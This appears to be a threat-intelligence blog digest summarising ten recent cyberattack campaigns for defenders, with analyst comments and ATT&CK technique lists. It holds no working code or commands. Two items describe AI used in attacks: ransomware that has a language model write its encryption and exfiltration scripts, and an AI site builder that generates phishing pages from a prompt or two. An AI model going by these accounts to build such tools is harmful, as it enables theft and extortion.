Blog

Anomali Cyber Watch: PromptLock Ransomware, Blind Eagle, Lovable Website Attacks, and More

Anomali Threat Research
September 2, 2025
Table of contents

PromptLock Ransomware Uses AI-Generated Lua to Encrypt and Steal Data

(published: August 28, 2025)

ESET researchers have uncovered PromptLock, the first known ransomware to integrate large language model output into its operations. Written in Go and uploaded to VirusTotal as a proof of concept, the malware queries the gpt-oss:20b model through the Ollama API to dynamically generate Lua scripts for file discovery, exfiltration, and encryption. This introduces non-determinism into execution, complicating detection. The ransomware implements the lightweight SPECK-128 cipher and targets Windows, macOS, and Linux. Analysts note unfinished features, including a placeholder Bitcoin address linked to Satoshi Nakamoto and an inactive wipe function, suggesting an experimental build rather than an active campaign.

Analyst Comment: What stands out with PromptLock is how it uses an LLM to change its code each time it runs. We’ve seen similar tricks before with polymorphic malware and fileless techniques, but here the model does the heavy lifting. That makes the process faster and easier, which puts more pressure on defenders to focus less on static signatures and more on behavior and anomalies. ESET notes that PromptLock has not been seen in their telemetry but was instead discovered on VirusTotal, leading them to conclude it is a proof-of-concept or work in progress rather than an active ransomware campaign.

Blind Eagle’s Five Clusters Target Colombian Government with Cracked RATs and Dynamic DNS

(published: August 28, 2025)

Recorded Future identified five related activity clusters tied to Blind Eagle, active from May 2024 through July 2025, with nearly 60% of observed activity hitting Colombian government entities. The campaigns used spearphishing that impersonated local agencies, URL shorteners, geofencing, and compromised email accounts to steer only in-region victims to attacker infrastructure. Delivery chained VBS and PowerShell to stage cracked commodity RATs such as AsyncRAT, DcRAT, Remcos, LimeRAT, and XWorm from legitimate services including Discord, Paste.ee, Internet Archive, Bitbucket, and Google Drive. Command infrastructure mixed Colombian ISP ranges with VPS or VPN hosts and relied on dynamic DNS like duckdns and noip, reflecting consistent but effective methods observed across clusters. Background research confirms Blind Eagle has targeted South America since at least 2018 across government and financial sectors.

Analyst Comment: Blind Eagle’s use of dynamic DNS stands out because it provides them resilience without investment. By leaning on services like DuckDNS and No-IP, they can swap out backend infrastructure quickly while keeping the same hostnames active. It is a simple tactic, but when paired with commodity RATs and free staging services, it gives the operation a kind of staying power that far outweighs the technical effort involved.

MITRE ATT&CK: T1566.001 - Phishing: Spearphishing Attachment | T1566.002 - Phishing: Spearphishing Link | T1586.002 - Compromise Accounts: Email Accounts | T1059.005 - Command and Scripting Interpreter: Visual Basic | T1059.001 - Command and Scripting Interpreter: Powershell | T1588.001 - Obtain Capabilities: Malware | T1608.001 - Stage Capabilities: Upload Malware | T1568 - Dynamic Resolution | T1105 - Ingress Tool Transfer

FBI Warning: QR Codes in Unsolicited Packages Could Be Scam

(published: August 17, 2025)

The FBI issued a Public Service Announcement warning that criminals are sending unsolicited packages containing QR codes. When recipients scan these codes, they may be directed to phishing sites asking for personal or financial information or unwittingly download malware onto their smartphones. The scam is a variation of “brushing” schemes, packages sent without sender information to entice curiosity and prompt scanning. The FBI advises against scanning QR codes from unknown sources, recommends reviewing app permissions carefully, and urges anyone suspecting they’ve been targeted to report the incident to the Internet Crime Complaint Center (IC3).

Analyst Comment: People in security have long understood the risks of QR codes, but I am not sure the same is true for the general public, especially as the FBI now feels the need to issue a warning. Walking through my area I see QR codes everywhere, on lamp posts, posters, and menus, and it is easy to forget they can lead anywhere. Also, it takes little effort for an attacker to place a malicious code over a legitimate one, redirecting someone to a cloned site. Take the time to talk with family and friends so they understand the risk, a collective awareness is what reduces the likelihood of these scams working.

MITRE ATT&CK: T1660 - Phishing | T1566.002 - Phishing: Spearphishing Link | T1598 - Phishing For Information

UNC6384 Uses Captive Portals to Deploy PlugX Against Diplomats

(published: August 28, 2025)

Google has linked a Chinese state-aligned group, UNC6384, to a campaign targeting diplomats in Southeast Asia. The attackers hijacked Wi-Fi captive portal checks, redirecting users to a fake update page secured with a valid certificate. From there, victims unknowingly downloaded a signed installer that used DLL sideloading to run a variant of the PlugX backdoor (also known as SOGU.SEC). This technique gave attackers covert remote access and persistence, while overlaps with Mustang Panda suggest shared tooling. Google has added detections to Safe Browsing and notified affected users.

Analyst Comment: A notable thread in this campaign is the repeated use of certificates issued to Chengdu Nuoxin Times Technology Co., Ltd. The STATICPLUGIN downloader was signed with a valid GlobalSign certificate, and more than two dozen other malicious binaries linked to China-nexus groups have carried Chengdu signatures since at least January 2023. In this case, the certificate was created in May 2025 and expired in July, suggesting a pattern of short-lived but recurring use. It is still unclear whether these certificates are stolen, misused, or deliberately supplied, but their continued presence may provide a useful pivot point for tracking related operations.

MITRE ATT&CK: T1598 - Phishing For Information | T1566.001 - Phishing: Spearphishing Attachment | T1574.001 - Hijack Execution Flow: Dll Search Order Hijacking | T1553.002 - Subvert Trust Controls: Code Signing | T1218.007 - Signed Binary Proxy Execution: Msiexec | T1071.001 - Application Layer Protocol: Web Protocols

Coordinated Scans Target Microsoft RDP Authentication Portals

(published: August 28, 2025)

GreyNoise observed a sharp jump in uniform scanning against Microsoft Remote Desktop authentication surfaces, first with 1,971 IPs on August 21 and then a larger wave exceeding 30,000 IPs on August 24. The probes hit both RD Web Access and the RDP Web Client in tandem, sharing a near-identical client signature and focusing on timing differences in login workflows to confirm valid usernames. Roughly 92% of the clustered IPs had prior malicious classification, with sources skewing to Brazil and targets concentrated in the United States. GreyNoise notes that pre-disclosure spikes like this often precede new CVEs within about six weeks, raising the risk of follow-on credential stuffing or password spraying if usernames are successfully enumerated.

Analyst Comment: The sudden jump to tens of thousands of IPs, all sharing the same client signature and hitting the same portals, reflects coordination, not noise. GreyNoise has seen this type of surge before new RDP vulnerabilities become public, which makes the timing important. Even if no new CVE emerges, large-scale username enumeration still enables credential attacks later. Now is the time to check remote desktop exposure, enforce strong authentication, and monitor for abnormal login activity before these probes shift into active exploitation.

MITRE ATT&CK: T1595 - Active Scanning | T1087 - Account Discovery | T1110.003 - Brute Force: Password Spraying | T1110.004 - Brute Force: Credential Stuffing

Transparent Tribe Uses Weaponized .desktop Files to Target Indian Government

(published: August 25, 2025)

Transparent Tribe, also known as APT36, is running a phishing campaign against Indian government and defense organizations by disguising Linux “.desktop” shortcut files as PDF documents. When opened, the files execute a shell script that installs a payload and displays a decoy document to mask the activity. Researchers note persistence through cron jobs and systemd services, alongside concurrent Windows targeting. The campaign reflects the group’s long-running focus on Indian government networks and overlaps with SideCopy-linked efforts to compromise multi-factor authentication workflows.

Analyst Comment: What caught my eye in this campaign is how the attackers use a real document on Google Drive to keep the victim comfortable while the payload installs in the background, almost like a sleight-of-hand trick. Splitting persistence between cron and systemd feels like a safeguard learned through experience, ensuring the foothold survives even if one method is spotted. Tactics like these rarely stay confined to one environment; once they prove effective, they tend to surface elsewhere with only minor adjustments. Hunt.io’s analysis also points to deployment of Poseidon, a Transparent Tribe backdoor with a history of supporting data collection, credential theft, and long-term access.

MITRE ATT&CK: T1583.001 - Acquire Infrastructure: Domains | T1566.001 - Phishing: Spearphishing Attachment | T1204.002 - User Execution: Malicious File | T1059.004 - Command and Scripting Interpreter: Unix Shell | T1053.003 - Scheduled Task/Job: Cron | T1543.002 - Create or Modify System Process: Systemd Service | T1036.007 - Masquerading: Double File Extension | T1036.005 - Masquerading: Match Legitimate Name Or Location | T1027 - Obfuscated Files Or Information | T1140 - Deobfuscate/Decode Files Or Information | T1622 - Debugger Evasion | T1497 - Virtualization/Sandbox Evasion | T1082 - System Information Discovery | T1105 - Ingress Tool Transfer | T1571 - Non-Standard Port | T1111 - Two-Factor Authentication Interception | T1041 - Exfiltration Over C2 Channel

AI Website Builder ‘Lovable’ Abused to Scale Phishing, Malware, and Fraud

(published: August 29, 2025)

Proofpoint researchers revealed that cybercriminals are exploiting Lovable, an AI website builder, to generate phishing sites, fraud pages, and malware delivery infrastructure at scale. The platform offers free hosting on the lovable.app domain, remixable templates, and automated design features that make it easy to launch convincing pages without coding skills. Since February 2025, Proofpoint has tracked tens of thousands of such URLs each month, spread through both email and SMS lures. Attackers have been observed using CAPTCHA gates, adversary-in-the-middle kits, and Telegram bots for credential theft. In June 2025, researchers demonstrated how Lovable could be used to create functional phishing sites with realistic backend logic and manipulative language in just one or two prompts, underscoring the risk of AI-driven abuse. Lovable has stated that security updates are being deployed to mitigate this misuse.

Analyst Comment: Lovable’s problem is the absence of guardrails. Where platforms like ChatGPT block malicious code or manipulative text, Lovable will generate it freely. That single difference may explain why threat actors are leaning on it, as the barrier to entry all but disappears. Creating phishing sites with backend logic and convincing language no longer requires skill or effort, which lowers the cognitive load and makes large-scale abuse much easier. Defenders can spot Lovable abuse by watching for *.lovable.app subdomains, the “Edit with Lovable” badge on free sites, or custom domains resolving to Lovable’s hosting IP. Certificate Transparency logs and fingerprinting of Lovable’s site templates provide further leads when attackers mask activity behind their own domains.

MITRE ATT&CK: T1583.006 - Acquire Infrastructure: Web Services | T1588.002 - Obtain Capabilities: Tool | T1608.005 - Stage Capabilities: Link Target | T1566.002 - Phishing: Spearphishing Link | T1566.003 - Phishing: Spearphishing Via Service | T1204.001 - User Execution: Malicious Link | T1056.003 - Input Capture: Web Portal Capture | T1111 - Two-Factor Authentication Interception | T1539 - Steal Web Session Cookie | T1656 - Impersonation | T1567 - Exfiltration Over Web Service

TamperedChef Infostealer Poses as Free PDF Editors in Google Ads

(published: August 29, 2025)

Researchers have uncovered “TamperedChef,” a malvertising campaign where attackers purchased Google Ads to push fake “AppSuite PDF Editor” installers. By exploiting ad placement, the malicious download appeared higher in search results and gained a veneer of legitimacy. Once installed, the loader contacts productivity-tools[.]ai and appsuites[.]ai, establishes persistence, and activates an infostealer that terminates browsers, extracts saved credentials, and exfiltrates cookies. Truesec links the activity back to June 26, with malicious features enabled only after August 21, highlighting a deliberate seeding strategy

Analyst Comment: I’m seeing a clear rise in infostealers being pushed through campaigns like this, and TamperedChef fits the pattern. What really stands out is the use of Google Ads, which gave the fake editor a higher billing in search results and made it appear more reputable. The delayed activation is another detail worth noting. By letting the program sit quietly before turning malicious, the attackers sidestepped early suspicion and built user trust. Both tactics are becoming more common, and together they make infostealers harder to catch early.

MITRE ATT&CK: T1566.002 - Phishing: Spearphishing Link | T1059 - Command And Scripting Interpreter | T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | T1027 - Obfuscated Files Or Information | T1036 - Masquerading | T1555 - Credentials From Password Stores | T1041 - Exfiltration Over C2 Channel

Google: Salesloft OAuth Breach Expanded Beyond Salesforce Integrations

(published: August 29, 2025)

Google and Mandiant report that actor UNC6395 used stolen OAuth and refresh tokens tied to the Salesloft Drift app to authenticate to customer Salesforce instances between August 8 and 18, 2025, exfiltrating large data sets and mining them for secrets such as AWS access keys, passwords, and Snowflake tokens. Google now says the compromise was not limited to Salesforce; attackers also accessed email for a very small number of Google Workspace accounts via the Drift Email integration on August 9. In response, affected tokens were revoked, the Drift Email integration to Workspace was disabled, and Salesforce temporarily disabled Salesloft integrations while investigations continue. Google states there is no compromise of Google Workspace or Alphabet itself.

Analyst Comment: The key detail here is that stolen OAuth tokens gave attackers direct, trusted access without needing to bypass MFA or trick users. According to Google and Mandiant, all Salesloft Drift customers should treat any and all authentication tokens stored in or connected to the Drift platform as potentially compromised.

MITRE ATT&CK: T1199 - Trusted Relationship | T1078.004 - Valid Accounts: Cloud Accounts | T1528 - Steal Application Access Token | T1550.001 - Use Alternate Authentication Material: Application Access Token | T1213 - Data From Information Repositories | T1114.002 - Email Collection: Remote Email Collection | T1567 - Exfiltration Over Web Service | T1090.003 - Proxy: Multi-Hop Proxy

Storm-0501 Shifts to Cloud-First Ransomware and Extortion

(published: August 29, 2025)

Microsoft reports that financially motivated actor Storm-0501 is moving away from endpoint encryption toward cloud-based impact. The group pivots from on-prem Active Directory into Microsoft Entra ID via Entra Connect Sync servers, finds a Global Administrator account without MFA, then elevates privileges to take control of Azure. They exfiltrate data with AzCopy, delete storage accounts and backups, and when immutability blocks deletion, they encrypt cloud data using new Azure Key Vault keys before issuing ransom demands, sometimes through Microsoft Teams.

Analyst Comment: Storm-0501’s shift shows how ransomware could be changing from traditional endpoint encryption toward cloud-native impact. By abusing Azure controls to delete, encrypt, and extort without deploying a binary, they reduce opportunities for detection. As endpoint defenses improve, other groups may follow this path, making cloud environments a new frontline for ransomware operations.

MITRE ATT&CK: T1059.001 - Command and Scripting Interpreter: Powershell | T1021.006 - Remote Services: Windows Remote Management | T1003.006 - OS Credential Dumping: Dcsync | T1069.003 - Permission Groups Discovery: Cloud Groups | T1526 - Cloud Service Discovery | T1580 - Cloud Infrastructure Discovery | T1548.005 - Abuse Elevation Control Mechanism: Temporary Elevated Cloud Access | T1098.003 - Account Manipulation: Add Office 365 Global Administrator Role | T1484.002 - Domain Policy Modification: Domain Trust Modification | T1530 - Data From Cloud Storage Object | T1567 - Exfiltration Over Web Service | T1490 - Inhibit System Recovery | T1485 - Data Destruction | T1486 - Data Encrypted For Impact

Anomali Threat Research

Anomali's Threat Research team continually tracks security threats to identify when new, highly critical security threats emerge. The Anomali Threat Research team's briefings discuss current threats and risks like botnets, data breaches, misconfigurations, ransomware, threat groups, and various vulnerabilities. The team also creates free and premium threat intelligence feeds for Anomali's industry-leading Threat Intelligence Platform, ThreatStream.

Propel your mission with amplified visibility, analytics, and AI.

Learn how Anomali can help you cost-effectively improve your security posture.